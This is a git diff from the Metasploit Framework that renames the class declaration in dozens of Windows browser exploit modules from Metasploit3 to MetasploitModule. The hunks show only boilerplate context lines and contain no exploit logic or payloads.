a/modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb b/modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb index 06ef17e639..635d5fc3be 100644 --- a/modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb +++ b/modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mozilla_firefox_xmlserializer.rb b/modules/exploits/windows/browser/mozilla_firefox_xmlserializer.rb index ac509c6e3d..3af07119d9 100644 --- a/modules/exploits/windows/browser/mozilla_firefox_xmlserializer.rb +++ b/modules/exploits/windows/browser/mozilla_firefox_xmlserializer.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mozilla_interleaved_write.rb b/modules/exploits/windows/browser/mozilla_interleaved_write.rb index 509d30f471..be9b94bf4a 100644 --- a/modules/exploits/windows/browser/mozilla_interleaved_write.rb +++ b/modules/exploits/windows/browser/mozilla_interleaved_write.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking # diff --git a/modules/exploits/windows/browser/mozilla_mchannel.rb b/modules/exploits/windows/browser/mozilla_mchannel.rb index 6f5fcddffe..351ab5261d 100644 --- a/modules/exploits/windows/browser/mozilla_mchannel.rb +++ b/modules/exploits/windows/browser/mozilla_mchannel.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mozilla_nssvgvalue.rb b/modules/exploits/windows/browser/mozilla_nssvgvalue.rb index 287360a20a..6b09d042d0 100644 --- a/modules/exploits/windows/browser/mozilla_nssvgvalue.rb +++ b/modules/exploits/windows/browser/mozilla_nssvgvalue.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mozilla_nstreerange.rb b/modules/exploits/windows/browser/mozilla_nstreerange.rb index 496bbf0123..46ba71e46e 100644 --- a/modules/exploits/windows/browser/mozilla_nstreerange.rb +++ b/modules/exploits/windows/browser/mozilla_nstreerange.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mozilla_reduceright.rb b/modules/exploits/windows/browser/mozilla_reduceright.rb index 7f378c62e7..2a78db1bb5 100644 --- a/modules/exploits/windows/browser/mozilla_reduceright.rb +++ b/modules/exploits/windows/browser/mozilla_reduceright.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb b/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb index 068a4c1a46..afe4d9aa3e 100644 --- a/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb +++ b/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms05_054_onload.rb b/modules/exploits/windows/browser/ms05_054_onload.rb index 300685a93e..9027e3b800 100644 --- a/modules/exploits/windows/browser/ms05_054_onload.rb +++ b/modules/exploits/windows/browser/ms05_054_onload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb b/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb index 65f8e87a6b..56b3424194 100644 --- a/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb +++ b/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # diff --git a/modules/exploits/windows/browser/ms06_013_createtextrange.rb b/modules/exploits/windows/browser/ms06_013_createtextrange.rb index 8a7966917d..a2f3bf5b41 100644 --- a/modules/exploits/windows/browser/ms06_013_createtextrange.rb +++ b/modules/exploits/windows/browser/ms06_013_createtextrange.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms06_055_vml_method.rb b/modules/exploits/windows/browser/ms06_055_vml_method.rb index bf5f1f7495..ec0c79bc03 100644 --- a/modules/exploits/windows/browser/ms06_055_vml_method.rb +++ b/modules/exploits/windows/browser/ms06_055_vml_method.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms06_057_webview_setslice.rb b/modules/exploits/windows/browser/ms06_057_webview_setslice.rb index 16b12abc37..958c1649d1 100644 --- a/modules/exploits/windows/browser/ms06_057_webview_setslice.rb +++ b/modules/exploits/windows/browser/ms06_057_webview_setslice.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms06_067_keyframe.rb b/modules/exploits/windows/browser/ms06_067_keyframe.rb index 775de5a215..fe0e20f400 100644 --- a/modules/exploits/windows/browser/ms06_067_keyframe.rb +++ b/modules/exploits/windows/browser/ms06_067_keyframe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking # diff --git a/modules/exploits/windows/browser/ms06_071_xml_core.rb b/modules/exploits/windows/browser/ms06_071_xml_core.rb index 98c92b6610..533beb1042 100644 --- a/modules/exploits/windows/browser/ms06_071_xml_core.rb +++ b/modules/exploits/windows/browser/ms06_071_xml_core.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb b/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb index ebe1eb2403..812cd9d774 100644 --- a/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb +++ b/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # diff --git a/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb b/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb index b53071abb3..09f40510e4 100644 --- a/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb +++ b/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms08_053_mediaencoder.rb b/modules/exploits/windows/browser/ms08_053_mediaencoder.rb index fc5f2e8ab7..e069312a05 100644 --- a/modules/exploits/windows/browser/ms08_053_mediaencoder.rb +++ b/modules/exploits/windows/browser/ms08_053_mediaencoder.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb b/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb index 8834323960..bddfbd2985 100644 --- a/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb +++ b/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms08_078_xml_corruption.rb b/modules/exploits/windows/browser/ms08_078_xml_corruption.rb index 9d941bb40b..d1bb4018fe 100644 --- a/modules/exploits/windows/browser/ms08_078_xml_corruption.rb +++ b/modules/exploits/windows/browser/ms08_078_xml_corruption.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms09_002_memory_corruption.rb b/modules/exploits/windows/browser/ms09_002_memory_corruption.rb index 3f2dc970a4..fb953019b4 100644 --- a/modules/exploits/windows/browser/ms09_002_memory_corruption.rb +++ b/modules/exploits/windows/browser/ms09_002_memory_corruption.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking # diff --git a/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb b/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb index 4c883ed1f3..5d223c0b62 100644 --- a/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb +++ b/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms09_043_owc_msdso.rb b/modules/exploits/windows/browser/ms09_043_owc_msdso.rb index 548fc18a29..8bef321090 100644 --- a/modules/exploits/windows/browser/ms09_043_owc_msdso.rb +++ b/modules/exploits/windows/browser/ms09_043_owc_msdso.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms09_072_style_object.rb b/modules/exploits/windows/browser/ms09_072_style_object.rb index e31cd4d028..db5edffd29 100644 --- a/modules/exploits/windows/browser/ms09_072_style_object.rb +++ b/modules/exploits/windows/browser/ms09_072_style_object.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms10_002_aurora.rb b/modules/exploits/windows/browser/ms10_002_aurora.rb index bb682e0e02..41e2c4b8f7 100644 --- a/modules/exploits/windows/browser/ms10_002_aurora.rb +++ b/modules/exploits/windows/browser/ms10_002_aurora.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms10_002_ie_object.rb b/modules/exploits/windows/browser/ms10_002_ie_object.rb index 5ba8df594e..c8c48f817f 100644 --- a/modules/exploits/windows/browser/ms10_002_ie_object.rb +++ b/modules/exploits/windows/browser/ms10_002_ie_object.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb b/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb index 38abad66ba..3bc77c655b 100644 --- a/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb +++ b/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb @@ -22,7 +22,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb b/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb index ef07915e4a..205ab89161 100644 --- a/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb +++ b/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb b/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb index 497cd2818f..097cae4618 100644 --- a/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb +++ b/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # diff --git a/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb b/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb index f6283f3c4d..a0d8c78154 100644 --- a/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb +++ b/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb b/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb index 3b272637f1..d6f2f8e684 100644 --- a/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb +++ b/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking # diff --git a/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb b/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb index 76165d8a84..5e71f5dabc 100644 --- a/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb +++ b/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking # diff --git a/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb b/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb index 74898d9b7d..fa32a72eb7 100644 --- a/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb +++ b/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms11_003_ie_css_import.rb b/modules/exploits/windows/browser/ms11_003_ie_css_import.rb index cbb1e33a3e..00a7558b92 100644 --- a/modules/exploits/windows/browser/ms11_003_ie_css_import.rb +++ b/modules/exploits/windows/browser/ms11_003_ie_css_import.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking # Need more love for Great include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb b/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb index 037424e5c5..8d6ebad0b1 100644 --- a/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb +++ b/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms11_081_option.rb b/modules/exploits/windows/browser/ms11_081_option.rb index 51c62c2f9b..b31eaf3ef2 100644 --- a/modules/exploits/windows/browser/ms11_081_option.rb +++ b/modules/exploits/windows/browser/ms11_081_option.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms11_093_ole32.rb b/modules/exploits/windows/browser/ms11_093_ole32.rb index ce333b7c93..b382a1498c 100644 --- a/modules/exploits/windows/browser/ms11_093_ole32.rb +++ b/modules/exploits/windows/browser/ms11_093_ole32.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms12_004_midi.rb b/modules/exploits/windows/browser/ms12_004_midi.rb index 22dcfc7b6a..16cec1843d 100644 --- a/modules/exploits/windows/browser/ms12_004_midi.rb +++ b/modules/exploits/windows/browser/ms12_004_midi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms12_037_ie_colspan.rb b/modules/exploits/windows/browser/ms12_037_ie_colspan.rb index de2192eb00..af516188b1 100644 --- a/modules/exploits/windows/browser/ms12_037_ie_colspan.rb +++ b/modules/exploits/windows/browser/ms12_037_ie_colspan.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms12_037_same_id.rb b/modules/exploits/windows/browser/ms12_037_same_id.rb index 6d6b762169..ae82b71a96 100644 --- a/modules/exploits/windows/browser/ms12_037_same_id.rb +++ b/modules/exploits/windows/browser/ms12_037_same_id.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb b/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb index a0302f48dc..66098c6c37 100644 --- a/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb +++ b/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb b/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb index cb409f5da7..d766b0638d 100644 --- a/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb +++ b/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb b/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb index 72a855ab3c..09200f72af 100644 --- a/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb +++ b/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/ms13_055_canchor.rb b/modules/exploits/windows/browser/ms13_055_canchor.rb index bbed4c4ee0..55980c503d 100644 --- a/modules/exploits/windows/browser/ms13_055_canchor.rb +++ b/modules/exploits/windows/browser/ms13_055_canchor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms13_059_cflatmarkuppointer.rb b/modules/exploits/windows/browser/ms13_059_cflatmarkuppointer.rb index 80881a1894..fc2563ea71 100644 --- a/modules/exploits/windows/browser/ms13_059_cflatmarkuppointer.rb +++ b/modules/exploits/windows/browser/ms13_059_cflatmarkuppointer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/ms13_069_caret.rb b/modules/exploits/windows/browser/ms13_069_caret.rb index aaf14954b6..6178bc76a8 100644 --- a/modules/exploits/windows/browser/ms13_069_caret.rb +++ b/modules/exploits/windows/browser/ms13_069_caret.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb b/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb index dd3327be64..6ee1ddd0da 100644 --- a/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb +++ b/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb b/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb index 99aa91da65..136025b1a0 100644 --- a/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb +++ b/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb b/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb index 8129288d3f..5b709aacba 100644 --- a/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb +++ b/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/ms14_012_textrange.rb b/modules/exploits/windows/browser/ms14_012_textrange.rb index b28f0dc273..5b2f00c98e 100644 --- a/modules/exploits/windows/browser/ms14_012_textrange.rb +++ b/modules/exploits/windows/browser/ms14_012_textrange.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb b/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb index 99cd39a738..a539f7c1f8 100644 --- a/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb +++ b/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/powershell' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/msvidctl_mpeg2.rb b/modules/exploits/windows/browser/msvidctl_mpeg2.rb index 70582071df..8a2c327422 100644 --- a/modules/exploits/windows/browser/msvidctl_mpeg2.rb +++ b/modules/exploits/windows/browser/msvidctl_mpeg2.rb @@ -22,7 +22,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mswhale_checkforupdates.rb b/modules/exploits/windows/browser/mswhale_checkforupdates.rb index 6acfe799f4..09b8351635 100644 --- a/modules/exploits/windows/browser/mswhale_checkforupdates.rb +++ b/modules/exploits/windows/browser/mswhale_checkforupdates.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb b/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb index 040ee2fa16..dac7e039f8 100644 --- a/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb +++ b/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/nctaudiofile2_setformatlikesample.rb b/modules/exploits/windows/browser/nctaudiofile2_setformatlikesample.rb index 5202ae760e..52f37d6fd8 100644 --- a/modules/exploits/windows/browser/nctaudiofile2_setformatlikesample.rb +++ b/modules/exploits/windows/browser/nctaudiofile2_setformatlikesample.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/nis2004_antispam.rb b/modules/exploits/windows/browser/nis2004_antispam.rb index d137afaaea..35671acecc 100644 --- a/modules/exploits/windows/browser/nis2004_antispam.rb +++ b/modules/exploits/windows/browser/nis2004_antispam.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/nis2004_get.rb b/modules/exploits/windows/browser/nis2004_get.rb index 292b1c9539..fb3fd45964 100644 --- a/modules/exploits/windows/browser/nis2004_get.rb +++ b/modules/exploits/windows/browser/nis2004_get.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/notes_handler_cmdinject.rb b/modules/exploits/windows/browser/notes_handler_cmdinject.rb index d6e76ffe2d..011b5f84d5 100644 --- a/modules/exploits/windows/browser/notes_handler_cmdinject.rb +++ b/modules/exploits/windows/browser/notes_handler_cmdinject.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb b/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb index 2c5c4424cf..a61d88ca68 100644 --- a/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb +++ b/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/novelliprint_callbackurl.rb b/modules/exploits/windows/browser/novelliprint_callbackurl.rb index 28b4f9ef75..042abf46a7 100644 --- a/modules/exploits/windows/browser/novelliprint_callbackurl.rb +++ b/modules/exploits/windows/browser/novelliprint_callbackurl.rb @@ -34,7 +34,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/novelliprint_datetime.rb 